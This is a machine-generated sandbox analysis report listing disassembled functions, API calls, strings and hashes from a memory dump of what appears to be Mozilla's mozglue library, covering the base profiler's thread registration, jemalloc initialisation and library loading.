API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: ed4784c2dcdc0c4429c0b83ba5e515f72194ed6f5c7d597cb6f9e5cb6f829cbb
Instruction ID: 00c1319eae37eeba6f88b9bf89c2b7c0c6b6015b8537330d60c273a7cfcd7339
Opcode Fuzzy Hash: ed4784c2dcdc0c4429c0b83ba5e515f72194ed6f5c7d597cb6f9e5cb6f829cbb
Instruction Fuzzy Hash: C8A14730A042549FDB00DF2EF956B6ABBA7FFC6318F144029EA1A87741DB70D811CBA1

Function 6661F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6661F8F9

Part of subcall function 665E6390: GetCurrentThreadId.KERNEL32 ref: 665E63D0
Part of subcall function 665E6390: AcquireSRWLockExclusive.KERNEL32 ref: 665E63DF
Part of subcall function 665E6390: ReleaseSRWLockExclusive.KERNEL32 ref: 665E640E

ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F93A
GetCurrentThreadId.KERNEL32 ref: 6661F98A
GetCurrentThreadId.KERNEL32 ref: 6661F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F716

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

Part of subcall function 665DB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 665DB5E0

GetCurrentThreadId.KERNEL32 ref: 6661F739
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F746
GetCurrentThreadId.KERNEL32 ref: 6661F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6665385B,00000002,?,?,?,?,?), ref: 6661F829
free.MOZGLUE(?,?,00000000,?), ref: 6661F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6661F866
free.MOZGLUE(?), ref: 6661FA0C

Part of subcall function 665E5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,665E55E1), ref: 665E5E8C
Part of subcall function 665E5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E5E9D
Part of subcall function 665E5E60: GetCurrentThreadId.KERNEL32 ref: 665E5EAB
Part of subcall function 665E5E60: GetCurrentThreadId.KERNEL32 ref: 665E5EB8
Part of subcall function 665E5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E5ECF
Part of subcall function 665E5E60: moz_xmalloc.MOZGLUE(00000024), ref: 665E5F27
Part of subcall function 665E5E60: moz_xmalloc.MOZGLUE(00000004), ref: 665E5F47
Part of subcall function 665E5E60: GetCurrentProcess.KERNEL32 ref: 665E5F53
Part of subcall function 665E5E60: GetCurrentThread.KERNEL32 ref: 665E5F5C
Part of subcall function 665E5E60: GetCurrentProcess.KERNEL32 ref: 665E5F66
Part of subcall function 665E5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 665E5F7E

free.MOZGLUE(?), ref: 6661F9C5
free.MOZGLUE(?), ref: 6661F9DA

Strings

" attempted to re-register as ", xrefs: 6661F858
Thread , xrefs: 6661F789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6661F9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6661F71F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b6358a8a53a004c3ce96eb4cdab1673c24a9d91627de728552a7236e5a0c7c59
Instruction ID: 4216c44d209751abbcd89c9bc5e9b479a3e5b591bf0f953a6ecf1deb2485d338
Opcode Fuzzy Hash: b6358a8a53a004c3ce96eb4cdab1673c24a9d91627de728552a7236e5a0c7c59
Instruction Fuzzy Hash: 6B8113709043009FDB01EF29E841A6ABFE6EFC5308F45856DE9499B351EB30EC45CB92

Function 665E4180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 665E4196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 665E41F1
VerSetConditionMask.NTDLL ref: 665E4223
VerSetConditionMask.NTDLL ref: 665E422A
VerSetConditionMask.NTDLL ref: 665E4231
VerSetConditionMask.NTDLL ref: 665E4238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 665E4245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 665E4263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 665E427A
FreeLibrary.KERNEL32(?), ref: 665E4299
memset.VCRUNTIME140(?,00000000,00000114), ref: 665E42C4
VerSetConditionMask.NTDLL ref: 665E42F6
VerSetConditionMask.NTDLL ref: 665E4302
VerSetConditionMask.NTDLL ref: 665E4309
VerSetConditionMask.NTDLL ref: 665E4310
VerSetConditionMask.NTDLL ref: 665E4317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 665E4324

Strings

SetProcessDpiAwareness, xrefs: 665E4274
Shcore.dll, xrefs: 665E425E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 0bae3e8a934215f84e7aeaab6e635e450b1aa8830a645d908ad4928bbef06f78
Instruction ID: acbd510d0d98b0d05c0eda1aebebf5fe5763aebaabe97c239c6b1cb22001dfde
Opcode Fuzzy Hash: 0bae3e8a934215f84e7aeaab6e635e450b1aa8830a645d908ad4928bbef06f78
Instruction Fuzzy Hash: 9851D171A002246BFF10AB65AC4ABBB776EEFCA710F014558FA05A72C0CB749D50CAD0

Function 6661EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661EE60
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EE6D
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6661EEA5
CloseHandle.KERNEL32(?), ref: 6661EEB4
free.MOZGLUE(00000000), ref: 6661EEBB
GetCurrentThreadId.KERNEL32 ref: 6661EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661EECF

Part of subcall function 6661DE60: GetCurrentThreadId.KERNEL32 ref: 6661DE73
Part of subcall function 6661DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,665E4A68), ref: 6661DE7B
Part of subcall function 6661DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,665E4A68), ref: 6661DEB8
Part of subcall function 6661DE60: free.MOZGLUE(00000000,?,665E4A68), ref: 6661DEFE
Part of subcall function 6661DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6661DF38

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

GetCurrentThreadId.KERNEL32 ref: 6661EF1E
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EF2B
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EF59
GetCurrentThreadId.KERNEL32 ref: 6661EFB0
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EFBD
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EFE1
GetCurrentThreadId.KERNEL32 ref: 6661EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F000

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6661F02F

Part of subcall function 6661F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6661F09B
Part of subcall function 6661F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6661F0AC
Part of subcall function 6661F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6661F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6661EED7
[I %d/%d] profiler_pause, xrefs: 6661F008

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 8ec155ed77c09fcebe61b5be6fc0465466762cc79058a6d3d796ffb6ae3356a5
Instruction ID: 42c974047a89ae8e09e71813512e36ccfa34bedff3276ab004ce8c35cd503c45
Opcode Fuzzy Hash: 8ec155ed77c09fcebe61b5be6fc0465466762cc79058a6d3d796ffb6ae3356a5
Instruction Fuzzy Hash: 685108358082B09FDB00DF6AF91A76ABFA7EBC6359F140155EB25C3741D7748910CBA2

Function 6660D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6665E804), ref: 6660D047
GetSystemInfo.KERNEL32(?), ref: 6660D093
__Init_thread_footer.LIBCMT ref: 6660D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6665E810,00000040), ref: 6660D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6665E7B8,00001388), ref: 6660D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6665E744,00001388), ref: 6660D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6665E784,00001388), ref: 6660D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6665E7DC,00001388), ref: 6660D1B1

Strings

MALLOC_OPTIONS, xrefs: 6660D0CB
MOZ_CRASH(), xrefs: 6660D277
Compile-time page size does not divide the runtime one., xrefs: 6660D26D
: (malloc) Unsupported character in malloc options: ', xrefs: 6660D322
<jemalloc>, xrefs: 6660D268, 6660D311

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 9eece25917f292b62ef3971d6dee1423788742179b2aa6e2b58a8f56399515d3
Instruction ID: 91364a619eea42afbc21f87425dba05e766dc0414a3ce95c6fbcf4e72c1e6e31
Opcode Fuzzy Hash: 9eece25917f292b62ef3971d6dee1423788742179b2aa6e2b58a8f56399515d3
Instruction Fuzzy Hash: BB81FB70D042A19BEF08CF69FA567697BE7EB96304F10027AEB0197381DB71D811CB96

Function 665E7FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 665E8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 665E801D

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 665E802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 665E803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 665E808D

Part of subcall function 665ECA10: mozalloc_abort.MOZGLUE(?), ref: 665ECAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 665E809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 665E80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 665E80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 665E80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 665E80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 665E810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 665E8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 665E8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 665E8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 665E817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 665E8199

Strings

0>af, xrefs: 665E811E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID: 0>af
API String ID: 2721933968-665678252
Opcode ID: 76770f361605f57433970663d9dd256c4b011594bab63c9bfd520007b67c7381
Instruction ID: bc7d4cf5872ecf552c3900b28b067a64ef13914409a0a6b3eb5ab99bb9dd39b6
Opcode Fuzzy Hash: 76770f361605f57433970663d9dd256c4b011594bab63c9bfd520007b67c7381
Instruction Fuzzy Hash: 235197B1D002146BDF00DFA5DC859AFBBB9AF99224F144125E925F7341E731DD05CBA2

Function 6661FAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6661FADC
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661FAE9
GetCurrentThreadId.KERNEL32 ref: 6661FB31
GetCurrentThreadId.KERNEL32 ref: 6661FB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6661FBF6
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661FC50

Strings

[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6661FD15
[D %d/%d] profiler_unregister_thread: %s, xrefs: 6661FC94

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: f80f25f1e138e2a3be2e9d6088e1bbe35cf7d1c6e4ddbbf6fed898f31291dd01
Instruction ID: d0add0dc3054d8c78c1559235464738c5d0f7be76c8e405608af2724694b502c
Opcode Fuzzy Hash: f80f25f1e138e2a3be2e9d6088e1bbe35cf7d1c6e4ddbbf6fed898f31291dd01
Instruction Fuzzy Hash: FB71B071908750CFDB14DF29E946B6ABBE2FFC5304F058569EA4987351E7309841CF92

Function 665E5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E5E9D

Part of subcall function 665F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,665F56EE,?,00000001), ref: 665F5B85
Part of subcall function 665F5B50: EnterCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5B90
Part of subcall function 665F5B50: LeaveCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5BD8
Part of subcall function 665F5B50: GetTickCount64.KERNEL32 ref: 665F5BE4

GetCurrentThreadId.KERNEL32 ref: 665E5EAB
GetCurrentThreadId.KERNEL32 ref: 665E5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 665E5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 665E6017

Part of subcall function 665D4310: moz_xmalloc.MOZGLUE(00000010,?,665D42D2), ref: 665D436A
Part of subcall function 665D4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,665D42D2), ref: 665D4387

moz_xmalloc.MOZGLUE(00000004), ref: 665E5F47
GetCurrentProcess.KERNEL32 ref: 665E5F53
GetCurrentThread.KERNEL32 ref: 665E5F5C
GetCurrentProcess.KERNEL32 ref: 665E5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 665E5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 665E5F27

Part of subcall function 665ECA10: mozalloc_abort.MOZGLUE(?), ref: 665ECAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,665E55E1), ref: 665E5E8C

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,665E55E1), ref: 665E605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,665E55E1), ref: 665E60CC

Strings

GeckoMain, xrefs: 665E5ECE, 665E6015

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: be3946dd83856fddc2ef60580ffa47f11f7a5942b65e0c7831b9f1f20307ed95
Instruction ID: cedd3f2989e69edf497bdb57e12f29d0ccbd2b1df25e6b128ac535fd75dd1626
Opcode Fuzzy Hash: be3946dd83856fddc2ef60580ffa47f11f7a5942b65e0c7831b9f1f20307ed95
Instruction Fuzzy Hash: 12719DB09047909FDB00DF29D882A2ABFF1FF99304F44496DE69687652D731E944CF92

Function 665E9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 665D31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 665D3217
Part of subcall function 665D31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 665D3236
Part of subcall function 665D31C0: FreeLibrary.KERNEL32 ref: 665D324B
Part of subcall function 665D31C0: __Init_thread_footer.LIBCMT ref: 665D3260
Part of subcall function 665D31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 665D327F
Part of subcall function 665D31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 665D328E
Part of subcall function 665D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 665D32AB
Part of subcall function 665D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 665D32D1
Part of subcall function 665D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 665D32E5
Part of subcall function 665D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 665D32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 665E9675
__Init_thread_footer.LIBCMT ref: 665E9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 665E96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 665E9707
__Init_thread_footer.LIBCMT ref: 665E971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 665E9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 665E97B7
FreeLibrary.KERNEL32 ref: 665E97D0
FreeLibrary.KERNEL32 ref: 665E97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 665E9824

Strings

MapViewOfFileNuma2, xrefs: 665E97B1
NtMapViewOfSection, xrefs: 665E9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 665E9670
ntdll.dll, xrefs: 665E96E3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
